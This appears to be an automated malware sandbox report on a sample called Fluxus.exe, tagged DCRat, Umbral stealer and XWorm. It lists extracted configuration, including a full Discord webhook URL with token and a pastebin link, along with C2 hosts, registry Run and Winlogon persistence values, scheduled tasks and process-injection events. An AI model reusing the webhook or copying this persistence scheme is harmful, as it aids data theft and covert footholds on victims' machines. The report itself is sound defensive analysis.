dcrat | 9bd3396602ac3cdb6508b15170466a45aef3c1dec2ae26384928f0c968de93d3

Analysis

max time kernel
143s
max time network
150s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
24-02-2024 15:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fluxus.exe
Size

1.1MB
MD5

f5ab76e991b3993cb87592fd73f7f085
SHA1

3674f19b3edb1e70ef70eeed43ec0abe51762a4e
SHA256

9bd3396602ac3cdb6508b15170466a45aef3c1dec2ae26384928f0c968de93d3
SHA512

36893eaf345645aa9dbea58d5e14a569b5f45d105d5e12412c0c42dddf585ffdafa28fc8ae3d44a6e3270d7de88377436a7ea6aff91e51c2daa43a0c4b3e83ec
SSDEEP

24576:U2G/nvxW3Ww0tKw0yRCKkqDtDRNkm7LW98tGTCs3UdM:UbA30gAHNqIhG

Score

10^/10

dcrat umbral xworm infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1210617396449251438/U-VjIPQsCfZ4pTjSW3Z1gHU__HbtzMvbFPpRLmLEuU2JKQ6AE2B9xW4bmo3NKRYSGcl8

Extracted

Family

xworm

Version

5.0

Mutex

7HPThVXvkAP1rsac

Attributes

install_file
USB.exe
pastebin_url
https://pastebin.com/raw/U0WSvAxn

aes.plain

Signatures

DcRat 36 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

pid	Process
2320	schtasks.exe
2208	schtasks.exe
2776	schtasks.exe
1696	schtasks.exe
2820	schtasks.exe
1432	schtasks.exe
580	schtasks.exe
1284	schtasks.exe
1660	schtasks.exe
1412	schtasks.exe
604	schtasks.exe
2720	schtasks.exe
2708	schtasks.exe
2692	schtasks.exe
1816	schtasks.exe
1884	schtasks.exe
2196	schtasks.exe
468	schtasks.exe
1904	schtasks.exe
788	schtasks.exe
2464	schtasks.exe
2180	schtasks.exe
1736	schtasks.exe
2300	schtasks.exe
1456	schtasks.exe
1604	schtasks.exe
2480	schtasks.exe
2204	schtasks.exe
2380	schtasks.exe
1128	schtasks.exe
2112	schtasks.exe
2764	schtasks.exe
1788	schtasks.exe
2368	schtasks.exe
1888	schtasks.exe
1588	schtasks.exe

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0004000000004ed7-55.dat	family_umbral
behavioral1/memory/2604-57-0x0000000000F70000-0x0000000000FB0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/memory/2096-146-0x0000000000100000-0x0000000000110000-memory.dmp	family_xworm
behavioral1/files/0x0005000000004ed7-145.dat	family_xworm

Modifies WinLogon for persistence 2 TTPs 12 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\winlogon.exe\", \"C:\\Program Files\\Google\\Chrome\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\", \"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\winlogon.exe\", \"C:\\Program Files\\Google\\Chrome\\winlogon.exe\", \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\", \"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\""	surrogatewininto.exe

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2464	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2300	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1456	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2196	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2320	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1128	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	468	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1904	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	604	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	788	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1412	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2692	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	2584	schtasks.exe	32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	2584	schtasks.exe	32

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x002f000000016122-9.dat	dcrat
behavioral1/memory/2660-13-0x00000000008E0000-0x00000000009B6000-memory.dmp	dcrat
behavioral1/files/0x002f0000000161ee-44.dat	dcrat
behavioral1/files/0x002f0000000161ee-45.dat	dcrat
behavioral1/memory/1224-46-0x0000000000E90000-0x0000000000F66000-memory.dmp	dcrat
behavioral1/memory/2604-59-0x000000001B130000-0x000000001B1B0000-memory.dmp	dcrat

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Saransk.exe

Executes dropped EXE 4 IoCs

pid	Process
2660	surrogatewininto.exe
1224	sppsvc.exe
2604	Saransk.exe
2096	XClient.exe

Loads dropped DLL 2 IoCs

pid	Process
2420	cmd.exe
2420	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\Web\\Wallpaper\\Landscapes\\cmd.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\AccessWeb\\System.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Google\\Chrome\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Google\\Chrome\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\taskhost.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\sppsvc.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\\dwm.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Idle.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\winlogon.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files (x86)\\Uninstall Information\\Idle.exe\""	surrogatewininto.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\explorer.exe\""	surrogatewininto.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
15	pastebin.com
16	pastebin.com
21	2.tcp.eu.ngrok.io
10	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Uninstall Information\6ccacd8608530f	surrogatewininto.exe
File created	C:\Program Files (x86)\Windows Portable Devices\Idle.exe	surrogatewininto.exe
File created	C:\Program Files (x86)\Windows Portable Devices\6ccacd8608530f	surrogatewininto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\System.exe	surrogatewininto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\27d1bcfc3c54e0	surrogatewininto.exe
File created	C:\Program Files\Google\Chrome\winlogon.exe	surrogatewininto.exe
File created	C:\Program Files\Google\Chrome\cc11b995f2a76d	surrogatewininto.exe
File created	C:\Program Files (x86)\Uninstall Information\Idle.exe	surrogatewininto.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\diagnostics\scheduled\winlogon.exe	surrogatewininto.exe
File created	C:\Windows\Web\Wallpaper\Landscapes\cmd.exe	surrogatewininto.exe
File created	C:\Windows\Web\Wallpaper\Landscapes\ebf1f9fa8afd6d	surrogatewininto.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 36 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1888	schtasks.exe
2380	schtasks.exe
1904	schtasks.exe
2112	schtasks.exe
2708	schtasks.exe
1660	schtasks.exe
2764	schtasks.exe
2368	schtasks.exe
2204	schtasks.exe
1816	schtasks.exe
2180	schtasks.exe
1128	schtasks.exe
788	schtasks.exe
580	schtasks.exe
2208	schtasks.exe
1412	schtasks.exe
2820	schtasks.exe
1736	schtasks.exe
1696	schtasks.exe
2480	schtasks.exe
1588	schtasks.exe
604	schtasks.exe
1432	schtasks.exe
1884	schtasks.exe
1788	schtasks.exe
2464	schtasks.exe
2300	schtasks.exe
2196	schtasks.exe
2320	schtasks.exe
1604	schtasks.exe
468	schtasks.exe
2720	schtasks.exe
2692	schtasks.exe
1456	schtasks.exe
1284	schtasks.exe
2776	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2104	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1284	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2660	surrogatewininto.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
1224	sppsvc.exe
2576	powershell.exe
340	powershell.exe
1428	powershell.exe
560	powershell.exe
2528	powershell.exe
2688	powershell.exe
2460	powershell.exe
2096	XClient.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1224	sppsvc.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2660	surrogatewininto.exe
Token: SeDebugPrivilege	1224	sppsvc.exe
Token: SeDebugPrivilege	2604	Saransk.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	560	powershell.exe
Token: SeIncreaseQuotaPrivilege	1836	wmic.exe
Token: SeSecurityPrivilege	1836	wmic.exe
Token: SeTakeOwnershipPrivilege	1836	wmic.exe
Token: SeLoadDriverPrivilege	1836	wmic.exe
Token: SeSystemProfilePrivilege	1836	wmic.exe
Token: SeSystemtimePrivilege	1836	wmic.exe
Token: SeProfSingleProcessPrivilege	1836	wmic.exe
Token: SeIncBasePriorityPrivilege	1836	wmic.exe
Token: SeCreatePagefilePrivilege	1836	wmic.exe
Token: SeBackupPrivilege	1836	wmic.exe
Token: SeRestorePrivilege	1836	wmic.exe
Token: SeShutdownPrivilege	1836	wmic.exe
Token: SeDebugPrivilege	1836	wmic.exe
Token: SeSystemEnvironmentPrivilege	1836	wmic.exe
Token: SeRemoteShutdownPrivilege	1836	wmic.exe
Token: SeUndockPrivilege	1836	wmic.exe
Token: SeManageVolumePrivilege	1836	wmic.exe
Token: 33	1836	wmic.exe
Token: 34	1836	wmic.exe
Token: 35	1836	wmic.exe
Token: SeIncreaseQuotaPrivilege	1836	wmic.exe
Token: SeSecurityPrivilege	1836	wmic.exe
Token: SeTakeOwnershipPrivilege	1836	wmic.exe
Token: SeLoadDriverPrivilege	1836	wmic.exe
Token: SeSystemProfilePrivilege	1836	wmic.exe
Token: SeSystemtimePrivilege	1836	wmic.exe
Token: SeProfSingleProcessPrivilege	1836	wmic.exe
Token: SeIncBasePriorityPrivilege	1836	wmic.exe
Token: SeCreatePagefilePrivilege	1836	wmic.exe
Token: SeBackupPrivilege	1836	wmic.exe
Token: SeRestorePrivilege	1836	wmic.exe
Token: SeShutdownPrivilege	1836	wmic.exe
Token: SeDebugPrivilege	1836	wmic.exe
Token: SeSystemEnvironmentPrivilege	1836	wmic.exe
Token: SeRemoteShutdownPrivilege	1836	wmic.exe
Token: SeUndockPrivilege	1836	wmic.exe
Token: SeManageVolumePrivilege	1836	wmic.exe
Token: 33	1836	wmic.exe
Token: 34	1836	wmic.exe
Token: 35	1836	wmic.exe
Token: SeIncreaseQuotaPrivilege	2616	wmic.exe
Token: SeSecurityPrivilege	2616	wmic.exe
Token: SeTakeOwnershipPrivilege	2616	wmic.exe
Token: SeLoadDriverPrivilege	2616	wmic.exe
Token: SeSystemProfilePrivilege	2616	wmic.exe
Token: SeSystemtimePrivilege	2616	wmic.exe
Token: SeProfSingleProcessPrivilege	2616	wmic.exe
Token: SeIncBasePriorityPrivilege	2616	wmic.exe
Token: SeCreatePagefilePrivilege	2616	wmic.exe
Token: SeBackupPrivilege	2616	wmic.exe
Token: SeRestorePrivilege	2616	wmic.exe
Token: SeShutdownPrivilege	2616	wmic.exe
Token: SeDebugPrivilege	2616	wmic.exe
Token: SeSystemEnvironmentPrivilege	2616	wmic.exe
Token: SeRemoteShutdownPrivilege	2616	wmic.exe
Token: SeUndockPrivilege	2616	wmic.exe
Token: SeManageVolumePrivilege	2616	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2096	XClient.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 2556	2872	Fluxus.exe	28
PID 2872 wrote to memory of 2556	2872	Fluxus.exe	28
PID 2872 wrote to memory of 2556	2872	Fluxus.exe	28
PID 2872 wrote to memory of 2556	2872	Fluxus.exe	28
PID 2556 wrote to memory of 2420	2556	WScript.exe	29
PID 2556 wrote to memory of 2420	2556	WScript.exe	29
PID 2556 wrote to memory of 2420	2556	WScript.exe	29
PID 2556 wrote to memory of 2420	2556	WScript.exe	29
PID 2420 wrote to memory of 2660	2420	cmd.exe	31
PID 2420 wrote to memory of 2660	2420	cmd.exe	31
PID 2420 wrote to memory of 2660	2420	cmd.exe	31
PID 2420 wrote to memory of 2660	2420	cmd.exe	31
PID 2660 wrote to memory of 1224	2660	surrogatewininto.exe	69
PID 2660 wrote to memory of 1224	2660	surrogatewininto.exe	69
PID 2660 wrote to memory of 1224	2660	surrogatewininto.exe	69
PID 2660 wrote to memory of 1224	2660	surrogatewininto.exe	69
PID 2660 wrote to memory of 1224	2660	surrogatewininto.exe	69
